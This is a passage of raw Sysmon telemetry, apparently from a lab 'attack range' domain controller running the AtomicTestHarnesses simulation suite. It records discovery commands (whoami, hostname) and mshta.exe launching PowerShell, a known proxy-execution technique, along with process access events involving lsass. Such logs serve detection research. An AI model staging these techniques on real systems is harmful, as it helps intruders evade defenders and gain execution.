indows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64) 154100x800000000000000029059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.154{7901BC46-53E2-6008-A206-00000000A301}6860C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000029058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.143{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53E2-6008-A106-00000000A301}2948C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.128{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.128{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.128{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.128{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.128{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53E2-6008-A106-00000000A301}2948C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.128{7901BC46-4FA9-6008-4305-00000000A301}74203768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53E2-6008-A106-00000000A301}2948C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a1632a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495f82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496043b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64) 154100x800000000000000029051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.140{7901BC46-53E2-6008-A106-00000000A301}2948C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000029207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.799{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.799{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.768{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.768{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000029203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.721{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1n5y0mcs.zkt.ps12021-01-20 16:01:39.721 10341000x800000000000000029202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.706{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.659{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-AA06-00000000A301}7064C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.659{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-AA06-00000000A301}7064C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.659{7901BC46-53E3-6008-AA06-00000000A301}7064628C:\Windows\system32\conhost.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.659{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-53E3-6008-AA06-00000000A301}7064C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.628{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.628{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.628{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.628{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.628{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.628{7901BC46-53E3-6008-A806-00000000A301}55087620C:\Windows\System32\mshta.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.631{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host bf8a3d31-de38-4b28-9ae6-f990ec1510d4; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exeC:\Windows\System32\mshta.exe -Embedding 10341000x800000000000000029190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.534{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.534{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 